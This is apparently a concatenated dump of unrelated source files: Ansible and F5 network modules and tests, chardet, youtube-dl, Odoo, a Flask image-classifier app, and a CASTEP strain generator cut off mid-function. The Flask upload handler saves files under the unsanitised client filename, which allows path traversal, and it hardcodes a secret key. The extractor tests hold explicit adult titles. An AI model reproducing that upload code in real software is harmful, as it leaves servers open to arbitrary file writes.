self.name, self.network_domain_selector
),
changed=False
)
return
if self.module.check_mode:
self.module.exit_json(
msg='VLAN "{0}" is present in network domain "{1}" (should be absent).'.format(
self.name, self.network_domain_selector
),
vlan=vlan_to_dict(vlan),
changed=True
)
self._delete_vlan(vlan)
self.module.exit_json(
msg='Deleted VLAN "{0}" from network domain "{1}".'.format(
self.name, self.network_domain_selector
),
changed=True
)
def _get_vlan(self, network_domain):
"""
Retrieve the target VLAN details from CloudControl.
:param network_domain: The target network domain.
:return: The VLAN, or None if the target VLAN was not found.
:rtype: DimensionDataVlan
"""
vlans = self.driver.ex_list_vlans(
location=self.location,
network_domain=network_domain
)
matching_vlans = [vlan for vlan in vlans if vlan.name == self.name]
if matching_vlans:
return matching_vlans[0]
return None
def _create_vlan(self, network_domain):
vlan = self.driver.ex_create_vlan(
network_domain,
self.name,
self.private_ipv4_base_address,
self.description,
self.private_ipv4_prefix_size
)
if self.wait:
vlan = self._wait_for_vlan_state(vlan.id, 'NORMAL')
return vlan
def _delete_vlan(self, vlan):
try:
self.driver.ex_delete_vlan(vlan)
# Not currently supported for deletes due to a bug in libcloud (module will error out if "wait" is specified when "state" is not "present").
if self.wait:
self._wait_for_vlan_state(vlan, 'NOT_FOUND')
except DimensionDataAPIException as api_exception:
self.module.fail_json(
msg='Failed to delete VLAN "{0}" due to unexpected error from the CloudControl API: {1}'.format(
vlan.id, api_exception.msg
)
)
def _wait_for_vlan_state(self, vlan, state_to_wait_for):
network_domain = self._get_network_domain()
wait_poll_interval = self.module.params['wait_poll_interval']
wait_time = self.module.params['wait_time']
# Bizarre bug in libcloud when checking status after delete; socket.error is too generic to catch in this context so for now we don't even try.
try:
return self.driver.connection.wait_for_state(
state_to_wait_for,
self.driver.ex_get_vlan,
wait_poll_interval,
wait_time,
vlan
)
except DimensionDataAPIException as api_exception:
if api_exception.code != 'RESOURCE_NOT_FOUND':
raise
return DimensionDataVlan(
id=vlan.id,
status='NOT_FOUND',
name='',
description='',
private_ipv4_range_address='',
private_ipv4_range_size=0,
ipv4_gateway='',
ipv6_range_address='',
ipv6_range_size=0,
ipv6_gateway='',
location=self.location,
network_domain=network_domain
)
def _get_network_domain(self):
"""
Retrieve the target network domain from the Cloud Control API.
:return: The network domain.
"""
try:
return self.get_network_domain(
self.network_domain_selector, self.location
)
except UnknownNetworkError:
self.module.fail_json(
msg='Cannot find network domain "{0}" in datacenter "{1}".'.format(
self.network_domain_selector, self.location
)
)
return None
class InvalidVlanChangeError(Exception):
"""
Error raised when an illegal change to VLAN state is attempted.
"""
pass
class VlanDiff(object):
"""
Represents differences between VLAN information (from CloudControl) and module parameters.
"""
def __init__(self, vlan, module_params):
"""
:param vlan: The VLAN information from CloudControl.
:type vlan: DimensionDataVlan
:param module_params: The module parameters.
:type module_params: dict
"""
self.vlan = vlan
self.module_params = module_params
self.name_changed = module_params['name'] != vlan.name
self.description_changed = module_params['description'] != vlan.description
self.private_ipv4_base_address_changed = module_params['private_ipv4_base_address'] != vlan.private_ipv4_range_address
self.private_ipv4_prefix_size_changed = module_params['private_ipv4_prefix_size'] != vlan.private_ipv4_range_size
# Is configured prefix size greater than or less than the actual prefix size?
private_ipv4_prefix_size_difference = module_params['private_ipv4_prefix_size'] - vlan.private_ipv4_range_size
self.private_ipv4_prefix_size_increased = private_ipv4_prefix_size_difference > 0
self.private_ipv4_prefix_size_decreased = private_ipv4_prefix_size_difference < 0
def has_changes(self):
"""
Does the VlanDiff represent any changes between the VLAN and module configuration?
        :return: True, if there are changes; otherwise, False.
"""
return self.needs_edit() or self.needs_expand()
def ensure_legal_change(self):
"""
Ensure the change (if any) represented by the VlanDiff represents a legal change to VLAN state.
- private_ipv4_base_address cannot be changed
- private_ipv4_prefix_size must be greater than or equal to the VLAN's existing private_ipv4_range_size
:raise InvalidVlanChangeError: The VlanDiff does not represent a legal change to VLAN state.
"""
# Cannot change base address for private IPv4 network.
if self.private_ipv4_base_address_changed:
raise InvalidVlanChangeError('Cannot change the private IPV4 base address for an existing VLAN.')
# Cannot shrink private IPv4 network (by increasing prefix size).
if self.private_ipv4_prefix_size_increased:
raise InvalidVlanChangeError('Cannot shrink the private IPV4 network for an existing VLAN (only expand is supported).')
def needs_edit(self):
"""
Is an Edit operation required to resolve the differences between the VLAN information and the module parameters?
:return: True, if an Edit operation is required; otherwise, False.
"""
return self.name_changed or self.description_changed
def needs_expand(self):
"""
Is an Expand operation required to resolve the differences between the VLAN information and the module parameters?
The VLAN's network is expanded by reducing the size of its network prefix.
:return: True, if an Expand operation is required; otherwise, False.
"""
return self.private_ipv4_prefix_size_decreased
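# Editor's note (worked example, not part of the original module): "expanding"
# a VLAN means *decreasing* the prefix size, which grows the address space.
# For instance, changing private_ipv4_prefix_size from 24 to 23 doubles the
# network from 256 to 512 addresses and is a legal expand, while changing it
# from 24 to 25 would shrink the network and ensure_legal_change() rejects it.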
def vlan_to_dict(vlan):
return {
'id': vlan.id,
'name': vlan.name,
'description': vlan.description,
'location': vlan.location.id,
'private_ipv4_base_address': vlan.private_ipv4_range_address,
'private_ipv4_prefix_size': vlan.private_ipv4_range_size,
'private_ipv4_gateway_address': vlan.ipv4_gateway,
        'private_ipv6_base_address': vlan.ipv6_range_address,
        'private_ipv6_prefix_size': vlan.ipv6_range_size,
        'private_ipv6_gateway_address': vlan.ipv6_gateway,
'status': vlan.status
}
def main():
module = DimensionDataVlanModule()
if module.state == 'present':
module.state_present()
elif module.state == 'readonly':
module.state_readonly()
elif module.state == 'absent':
module.state_absent()
if __name__ == '__main__':
main()
|
twlizer/plugin.video.Pseudonymous
|
refs/heads/master
|
chardet/codingstatemachine.py
|
206
|
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is mozilla.org code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from .constants import eStart
from .compat import wrap_ord
class CodingStateMachine:
def __init__(self, sm):
self._mModel = sm
self._mCurrentBytePos = 0
self._mCurrentCharLen = 0
self.reset()
def reset(self):
self._mCurrentState = eStart
def next_state(self, c):
# for each byte we get its class
# if it is first byte, we also get byte length
# PY3K: aBuf is a byte stream, so c is an int, not a byte
byteCls = self._mModel['classTable'][wrap_ord(c)]
if self._mCurrentState == eStart:
self._mCurrentBytePos = 0
self._mCurrentCharLen = self._mModel['charLenTable'][byteCls]
# from byte's class and stateTable, we get its next state
curr_state = (self._mCurrentState * self._mModel['classFactor']
+ byteCls)
self._mCurrentState = self._mModel['stateTable'][curr_state]
self._mCurrentBytePos += 1
return self._mCurrentState
def get_current_charlen(self):
return self._mCurrentCharLen
def get_coding_state_machine(self):
return self._mModel['name']
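# Illustrative usage sketch (editor's addition; the toy model below is
# hypothetical -- real models such as the UTF-8 state machine live elsewhere
# in chardet). It shows the feed-one-byte-at-a-time protocol of the class.
if __name__ == '__main__':
    toy_model = {
        'classTable': [0] * 256,  # map every byte to class 0
        'charLenTable': [1],      # class 0 starts a 1-byte character
        'classFactor': 1,         # one class per state-table row
        'stateTable': [eStart],   # (state 0, class 0) -> eStart again
        'name': 'toy-sm',
    }
    sm = CodingStateMachine(toy_model)
    for byte in (0x61, 0x62, 0x63):  # 'a', 'b', 'c'
        sm.next_state(byte)
    print(sm.get_coding_state_machine())  # -> 'toy-sm'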
|
luoxufeiyan/python
|
refs/heads/master
|
NKUCodingCat/0007/0007.py
|
40
|
#coding=utf-8
import os,sys,re
def each(path):
All = []
for root, dirs, files in os.walk(path):
for name in files:
All.append(root+"/"+name)
return All
def deal(input):
    if os.path.splitext(input)[1] in [".py", ".pyw"]:
        total, comment, empty = 0, 0, 0
        f = open(input, "r")
        in_comment = False
        for line in f:
            total += 1
            if re.findall("\"\"\"$", line):
                # toggle docstring state on lines ending with triple quotes
                in_comment = not in_comment
            if not re.findall("\S", line):
                empty += 1
            # count indented comments too, and lines inside docstrings
            if line.lstrip().startswith("#") or in_comment:
                comment += 1
        f.close()
        return total, comment, empty
    else:
        return 0, 0, 0
if len(sys.argv)<=1:
print "The Script will calculate the LOC of the file in "+os.path.split(os.path.realpath(__file__))[0]+"/"
path = os.path.split(os.path.realpath(__file__))[0]+"/"
else:
print "calculating the file in "+sys.argv[1]
if os.path.isdir(sys.argv[1]):
path = sys.argv[1]
else:
print "Path Error! use this script as "+os.path.split(os.path.realpath(__file__))[1]+" [path]"
t,c,e = 0,0,0
for i in each(path):
t_a,c_a,e_a = deal(i)
t+=t_a
c+=c_a
e+=e_a
print("Total lines: %s. Empty lines: %s. Comment Lines: %s." % (t, e, c))
|
ClearCorp-dev/odoo
|
refs/heads/8.0
|
addons/event/report/__init__.py
|
435
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import report_event_registration
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
misterhat/youtube-dl
|
refs/heads/master
|
youtube_dl/extractor/pornhd.py
|
19
|
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import (
ExtractorError,
int_or_none,
js_to_json,
)
class PornHdIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?pornhd\.com/(?:[a-z]{2,4}/)?videos/(?P<id>\d+)(?:/(?P<display_id>.+))?'
_TESTS = [{
'url': 'http://www.pornhd.com/videos/9864/selfie-restroom-masturbation-fun-with-chubby-cutie-hd-porn-video',
'md5': 'c8b964b1f0a4b5f7f28ae3a5c9f86ad5',
'info_dict': {
'id': '9864',
'display_id': 'selfie-restroom-masturbation-fun-with-chubby-cutie-hd-porn-video',
'ext': 'mp4',
'title': 'Restroom selfie masturbation',
'description': 'md5:3748420395e03e31ac96857a8f125b2b',
'thumbnail': 're:^https?://.*\.jpg',
'view_count': int,
'age_limit': 18,
}
}, {
# removed video
'url': 'http://www.pornhd.com/videos/1962/sierra-day-gets-his-cum-all-over-herself-hd-porn-video',
'md5': '956b8ca569f7f4d8ec563e2c41598441',
'info_dict': {
'id': '1962',
'display_id': 'sierra-day-gets-his-cum-all-over-herself-hd-porn-video',
'ext': 'mp4',
'title': 'Sierra loves doing laundry',
'description': 'md5:8ff0523848ac2b8f9b065ba781ccf294',
'thumbnail': 're:^https?://.*\.jpg',
'view_count': int,
'age_limit': 18,
},
'skip': 'Not available anymore',
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
video_id = mobj.group('id')
display_id = mobj.group('display_id')
webpage = self._download_webpage(url, display_id or video_id)
title = self._html_search_regex(
[r'<span[^>]+class=["\']video-name["\'][^>]*>([^<]+)',
r'<title>(.+?) - .*?[Pp]ornHD.*?</title>'], webpage, 'title')
sources = self._parse_json(js_to_json(self._search_regex(
r"(?s)'sources'\s*:\s*(\{.+?\})\s*\}[;,)]",
webpage, 'sources', default='{}')), video_id)
if not sources:
message = self._html_search_regex(
r'(?s)<(div|p)[^>]+class="no-video"[^>]*>(?P<value>.+?)</\1',
webpage, 'error message', group='value')
raise ExtractorError('%s said: %s' % (self.IE_NAME, message), expected=True)
formats = []
for format_id, video_url in sources.items():
if not video_url:
continue
height = int_or_none(self._search_regex(
r'^(\d+)[pP]', format_id, 'height', default=None))
formats.append({
'url': video_url,
'format_id': format_id,
'height': height,
})
self._sort_formats(formats)
description = self._html_search_regex(
r'<(div|p)[^>]+class="description"[^>]*>(?P<value>[^<]+)</\1',
webpage, 'description', fatal=False, group='value')
view_count = int_or_none(self._html_search_regex(
r'(\d+) views\s*<', webpage, 'view count', fatal=False))
thumbnail = self._search_regex(
r"'poster'\s*:\s*'([^']+)'", webpage, 'thumbnail', fatal=False)
return {
'id': video_id,
'display_id': display_id,
'title': title,
'description': description,
'thumbnail': thumbnail,
'view_count': view_count,
'formats': formats,
'age_limit': 18,
}
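# Editor's note (assumption inferred from the parsing code above): the
# scraped 'sources' object is expected to look roughly like
#   {"480p": "http://.../video480.mp4", "720p": "http://.../video720.mp4"}
# i.e. format-id keys whose leading digits give the height, mapped to direct
# video URLs.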
|
robben1234/CNN-CIFAR10-Classifier
|
refs/heads/master
|
image-classifier.py
|
1
|
import os
from flask import Flask, flash, request, redirect, url_for, jsonify
from flask import render_template
from werkzeug.contrib.fixers import ProxyFix
from cnncifar10use import predict as nn_predict
app = Flask(__name__)
app.wsgi_app = ProxyFix(app.wsgi_app)
CLASSES = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck']
APP_ROOT = os.path.dirname(os.path.abspath(__file__))
UPLOAD_FOLDER = os.path.join(APP_ROOT, 'static/uploads')
ALLOWED_EXTENSIONS = {'png', 'jpg', 'jpeg', 'gif'}
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
app.config['APP_ROOT'] = APP_ROOT
app.config['MAX_CONTENT_LENGTH'] = 16 * 1024 * 1024
def allowed_file(filename):
    # extension check, case-insensitive (e.g. ".PNG" is accepted)
    return '.' in filename and \
        filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
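# e.g. allowed_file('cat.png') -> True, allowed_file('cat.svg') -> False
# (editor's note illustrating the extension check above)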
@app.route('/upload', methods=['GET', 'POST'])
def upload_file():
if request.method == 'POST':
print("/upload post request")
if 'file' not in request.files:
flash('No file part')
return redirect(request.url)
file = request.files['file']
print(file)
if file.filename == '':
flash('No selected file')
return redirect(request.url)
if file and allowed_file(file.filename):
path = os.path.join(app.config['UPLOAD_FOLDER'], file.filename)
file.save(path)
            pred_f, pred = nn_predict(path, app.config['APP_ROOT'])
result = CLASSES[pred]
print("%s"%result)
# os.remove(path)
for the_file in os.listdir(app.config['UPLOAD_FOLDER']):
fp = os.path.join(app.config['UPLOAD_FOLDER'], the_file)
try:
if os.path.isfile(fp):
os.unlink(fp)
except Exception as e:
print(e)
return jsonify(class_of_image=result)
return '''
<!doctype html>
<title>Upload new File</title>
<h1>Upload new File</h1>
<form action="" method=post enctype=multipart/form-data>
<p><input type=file name=file>
<input type=submit value=Upload>
</form>
'''
@app.route('/')
def hello_world():
return render_template('home.html')
if __name__ == '__main__':
app.secret_key = 'super secret key'
app.config['SESSION_TYPE'] = 'filesystem'
app.run()
|
darko-bede/HardWay
|
refs/heads/master
|
ex32.py
|
1
|
the_count = [1, 2, 3, 4, 5]
fruits = ["apples", "oranges", "pears", "apricots"]
change = [1, "pennies", 2, "dimes", 3, "quarters"]
# This first kind of for loop goes through a list
for number in the_count:
print "This is count %d" % number
# same as above
for fruit in fruits:
print "A fruit of type: %s" % fruit
# also we can go through mixed lists too
# notice we have to use %r since we don't know what's in it
for i in change:
print "I got %r" % i
# we can also build lists, first start with an empty one
elements = []
# then use the range function to do 0 to 5 counts
for i in range(0, 6):
print "Adding %d to the list." % i
# append is a function that lists understand
elements.append(i)
# now we can print them out too
for i in elements:
print "Elements was: %d" % i
|
wrouesnel/ansible
|
refs/heads/devel
|
test/units/modules/network/f5/test_bigip_ucs.py
|
12
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2017 F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
import sys
from nose.plugins.skip import SkipTest
if sys.version_info < (2, 7):
raise SkipTest("F5 Ansible modules require Python >= 2.7")
from ansible.compat.tests import unittest
from ansible.compat.tests.mock import Mock
from ansible.compat.tests.mock import patch
from ansible.module_utils.basic import AnsibleModule
try:
from library.bigip_ucs import Parameters
from library.bigip_ucs import ModuleManager
from library.bigip_ucs import ArgumentSpec
from library.bigip_ucs import V1Manager
from library.bigip_ucs import V2Manager
from library.module_utils.network.f5.common import F5ModuleError
from library.module_utils.network.f5.common import iControlUnexpectedHTTPError
from test.unit.modules.utils import set_module_args
except ImportError:
try:
from ansible.modules.network.f5.bigip_ucs import Parameters
from ansible.modules.network.f5.bigip_ucs import ModuleManager
from ansible.modules.network.f5.bigip_ucs import ArgumentSpec
from ansible.modules.network.f5.bigip_ucs import V1Manager
from ansible.modules.network.f5.bigip_ucs import V2Manager
from ansible.module_utils.network.f5.common import F5ModuleError
from ansible.module_utils.network.f5.common import iControlUnexpectedHTTPError
from units.modules.utils import set_module_args
except ImportError:
raise SkipTest("F5 Ansible modules require the f5-sdk Python library")
fixture_path = os.path.join(os.path.dirname(__file__), 'fixtures')
fixture_data = {}
def load_fixture(name):
path = os.path.join(fixture_path, name)
if path in fixture_data:
return fixture_data[path]
with open(path) as f:
data = f.read()
try:
data = json.loads(data)
except Exception:
pass
fixture_data[path] = data
return data
class TestParameters(unittest.TestCase):
def test_module_parameters(self):
args = dict(
ucs="/root/bigip.localhost.localdomain.ucs",
force=True,
include_chassis_level_config=True,
no_license=True,
no_platform_check=True,
passphrase="foobar",
reset_trust=True,
state='installed'
)
p = Parameters(params=args)
assert p.ucs == '/root/bigip.localhost.localdomain.ucs'
assert p.force is True
assert p.include_chassis_level_config is True
assert p.no_license is True
assert p.no_platform_check is True
assert p.passphrase == "foobar"
assert p.reset_trust is True
assert p.install_command == \
"tmsh load sys ucs /var/local/ucs/bigip.localhost.localdomain.ucs " \
"include-chassis-level-config no-license no-platform-check " \
"passphrase foobar reset-trust"
def test_module_parameters_false_ucs_booleans(self):
args = dict(
ucs="/root/bigip.localhost.localdomain.ucs",
include_chassis_level_config=False,
no_license=False,
no_platform_check=False,
reset_trust=False
)
p = Parameters(params=args)
assert p.ucs == '/root/bigip.localhost.localdomain.ucs'
assert p.include_chassis_level_config is False
assert p.no_license is False
assert p.no_platform_check is False
assert p.reset_trust is False
assert p.install_command == "tmsh load sys ucs /var/local/ucs/bigip.localhost.localdomain.ucs"
class TestV1Manager(unittest.TestCase):
def setUp(self):
self.spec = ArgumentSpec()
self.patcher1 = patch('time.sleep')
self.patcher1.start()
def tearDown(self):
self.patcher1.stop()
def test_ucs_default_present(self, *args):
set_module_args(dict(
ucs="/root/bigip.localhost.localdomain.ucs",
server='localhost',
password='password',
user='admin'
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.is_version_v1 = Mock(return_value=True)
vm = V1Manager(module=module)
vm.create_on_device = Mock(return_value=True)
vm.exists = Mock(side_effect=[False, True])
results = vm.exec_module()
assert results['changed'] is True
def test_ucs_explicit_present(self, *args):
set_module_args(dict(
ucs="/root/bigip.localhost.localdomain.ucs",
server='localhost',
password='password',
user='admin',
state='present'
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.is_version_v1 = Mock(return_value=True)
vm = V1Manager(module=module)
vm.create_on_device = Mock(return_value=True)
vm.exists = Mock(side_effect=[False, True])
results = vm.exec_module()
assert results['changed'] is True
def test_ucs_installed(self, *args):
set_module_args(dict(
ucs="/root/bigip.localhost.localdomain.ucs",
server='localhost',
password='password',
user='admin',
state='installed'
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.is_version_v1 = Mock(return_value=True)
vm = V1Manager(module=module)
vm.create_on_device = Mock(return_value=True)
vm.exists = Mock(return_value=True)
vm.install_on_device = Mock(return_value=True)
results = vm.exec_module()
assert results['changed'] is True
def test_ucs_absent_exists(self, *args):
set_module_args(dict(
ucs="/root/bigip.localhost.localdomain.ucs",
server='localhost',
password='password',
user='admin',
state='absent'
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.is_version_v1 = Mock(return_value=True)
vm = V1Manager(module=module)
vm.remove_from_device = Mock(return_value=True)
vm.exists = Mock(side_effect=[True, False])
results = vm.exec_module()
assert results['changed'] is True
def test_ucs_absent_fails(self, *args):
set_module_args(dict(
ucs="/root/bigip.localhost.localdomain.ucs",
server='localhost',
password='password',
user='admin',
state='absent'
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.is_version_v1 = Mock(return_value=True)
vm = V1Manager(module=module)
vm.remove_from_device = Mock(return_value=True)
vm.exists = Mock(side_effect=[True, True])
with pytest.raises(F5ModuleError) as ex:
vm.exec_module()
assert 'Failed to delete' in str(ex.value)
class TestV2Manager(unittest.TestCase):
def setUp(self):
self.spec = ArgumentSpec()
def test_ucs_default_present(self, *args):
set_module_args(dict(
ucs="/root/bigip.localhost.localdomain.ucs",
server='localhost',
password='password',
user='admin'
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.is_version_v1 = Mock(return_value=False)
vm = V2Manager(module=module)
vm.create_on_device = Mock(return_value=True)
vm.exists = Mock(side_effect=[False, True])
results = vm.exec_module()
assert results['changed'] is True
def test_ucs_explicit_present(self, *args):
set_module_args(dict(
ucs="/root/bigip.localhost.localdomain.ucs",
server='localhost',
password='password',
user='admin',
state='present'
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.is_version_v1 = Mock(return_value=False)
vm = V2Manager(module=module)
vm.create_on_device = Mock(return_value=True)
vm.exists = Mock(side_effect=[False, True])
results = vm.exec_module()
assert results['changed'] is True
def test_ucs_installed(self, *args):
set_module_args(dict(
ucs="/root/bigip.localhost.localdomain.ucs",
server='localhost',
password='password',
user='admin',
state='installed'
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.is_version_v1 = Mock(return_value=False)
vm = V2Manager(module=module)
vm.create_on_device = Mock(return_value=True)
vm.exists = Mock(return_value=True)
vm.install_on_device = Mock(return_value=True)
results = vm.exec_module()
assert results['changed'] is True
def test_ucs_absent_exists(self, *args):
set_module_args(dict(
ucs="/root/bigip.localhost.localdomain.ucs",
server='localhost',
password='password',
user='admin',
state='absent'
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.is_version_v1 = Mock(return_value=False)
        vm = V2Manager(module=module)
vm.remove_from_device = Mock(return_value=True)
vm.exists = Mock(side_effect=[True, False])
results = vm.exec_module()
assert results['changed'] is True
def test_ucs_absent_fails(self, *args):
set_module_args(dict(
ucs="/root/bigip.localhost.localdomain.ucs",
server='localhost',
password='password',
user='admin',
state='absent'
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.is_version_v1 = Mock(return_value=False)
        vm = V2Manager(module=module)
vm.remove_from_device = Mock(return_value=True)
vm.exists = Mock(side_effect=[True, True])
with pytest.raises(F5ModuleError) as ex:
vm.exec_module()
assert 'Failed to delete' in str(ex.value)
|
andreww/elastic-constants
|
refs/heads/master
|
generate_strain.py
|
1
|
#!/usr/bin/env python
"""
generate_strain.py
Generate strained castep input files and
.cijdat files for elastic constants calculation
for analysis with elastics.py
Copyright (c) 2010-2020 Andrew Walker <a.walker@leeds.ac.uk>
All rights reserved.
"""
from __future__ import print_function
import sys
import os
import optparse
import re
import numpy as np
import castep
version = 0.1
def PointGroup2StrainPat(pointgroup):
"""
Converts point group number (as ordered by CASTEP
and in the International Tables) to a number representing
the needed strain pattern.
"""
supcode = 0
if (pointgroup < 1):
print("Point group number " + str(pointgroup) + " not recognized.")
sys.exit(1)
elif (pointgroup <= 2):
# Triclinic
patt = 1
elif (pointgroup <= 5):
# Monoclinic
patt = 2
elif (pointgroup <= 8):
# Orthorhombic
patt = 3
elif (pointgroup <= 15):
# Tetragonal
patt = 4
elif (pointgroup <= 17):
# Trigonal-Low
patt = 6
elif (pointgroup <= 20):
# Trigonal-High
patt = 7
supcode = 1
elif (pointgroup <= 27):
# Hexagonal
patt = 7
elif (pointgroup <= 32):
# Cubic
patt = 5
else:
print("Point group number " + str(pointgroup) + " not recognized.\n")
sys.exit(1)
return patt, supcode
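# Editor's note (worked example): point group 30 falls in the 28-32 range, so
# PointGroup2StrainPat(30) returns (5, 0) -- strain pattern 5 (cubic) with no
# supplementary code. Point group 19 (trigonal-high) returns (7, 1).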
def GetStrainPatterns(code, supcode):
"""
Given a code number for the crystal symmetry,
returns a list of strain patterns needed for
the calculation of the elastic constants tensor.
Each pattern is a 6 element list, the subscript
reflects the strain in IRE notation
Supported Strain Patterns
-------------------------
5 Cubic: e1+e4
7 Hexagonal: e3 and e1+e4
7 Trigonal-High (32, 3m, -3m): e1 and e3+e4
6 Trigonal-Low (3, -3): e1 and e3+e4
4 Tetragonal: e1+e4 and e3+e6
3 Orthorhombic: e1+e4 and e2+e5 and e3+e6
2 Monoclinic: e1+e4 and e3+e6 and e2 and e5
1 Triclinic: e1 to e6 separately
0 Unknown...
"""
if (code == 1):
pattern = [[1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 1.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 1.0]]
elif (code == 2):
pattern = [[1.0, 0.0, 0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 0.0, 0.0, 1.0],
[0.0, 1.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 1.0, 0.0]]
elif (code == 3):
pattern = [[1.0, 0.0, 0.0, 1.0, 0.0, 0.0],
[0.0, 1.0, 0.0, 0.0, 1.0, 0.0],
[0.0, 0.0, 1.0, 0.0, 0.0, 1.0]]
elif (code == 4):
pattern = [[1.0, 0.0, 0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 0.0, 0.0, 1.0]]
elif (code == 5):
pattern = [[1.0, 0.0, 0.0, 1.0, 0.0, 0.0]]
elif (code == 6):
pattern = [[1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 1.0, 0.0, 0.0]]
elif (code == 7):
        # NB: is this correct for hex and high trig? - see mismatch above.
        # I suspect I have to rotate the lattice for trig high?
pattern = [[0.0, 0.0, 1.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 1.0, 0.0, 0.0]]
if supcode == 1:
pattern = [[1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 1.0, 0.0, 0.0]]
return pattern
def get_options(input_options, libmode):
"""
Just extracts the command line arguments into an options object
"""
if not libmode:
p = optparse.OptionParser(usage="%prog [options] seedname\n" +
"Generate CASTEP input for elastic constants calculation",
version="%prog "+str(version))
p.add_option('--debug', '-d', action='store_true',
help="Debug mode (output to stdout rather than file)")
p.add_option('--steps', '-n', action='store', type='int',
dest="numsteps",
help='Number of positive strain magnitudes to impose' +
' (defaults to 3)')
p.add_option('--strain', '-s', action='store', type='float',
dest="strain", help='Maximum magnitude of deformation to' +
' produced strained cells (defaults to 0.1)')
p.add_option('--lattice', '-l', action='store', type='int',
dest="lattice", help='Lattice type to set pattern of' +
' deformation (extracted from .castep file)')
options,arguments = p.parse_args(args=input_options)
return options, arguments
def cellABC2cellCART (a, b, c, alp, bet, gam, Convention=1):
"""
Given three lattice vector lengths and angles, returns
three vectors (as list of lists:
[[a_x, a_y, a_z], [b_x, b_y, b_z], [c_x, c_y, c_z]]) representing
    the vectors on a cartesian frame.
    """
    # Get lattice vectors on cart frame from a, b, c and angles
# For monoclinic, b // Y and c // Z
if (alp == 90.0):
sina = 1.0
cosa = 0.0
else:
sina = np.sin(np.radians(alp))
cosa = np.cos(np.radians(alp))
if (bet == 90.0):
sinb = 1.0
cosb = 0.0
else:
sinb = np.sin(np.radians(bet))
cosb = np.cos(np.radians(bet))
if (gam == 90.0):
sing = 1.0
cosg = 0.0
else:
sing = np.sin(np.radians(gam))
cosg = np.cos(np.radians(gam))
c_x = 0.0
c_y = 0.0
c_z = c
b_x = 0.0
b_y = b*sina
b_z = b*cosa
a_z = a*cosb
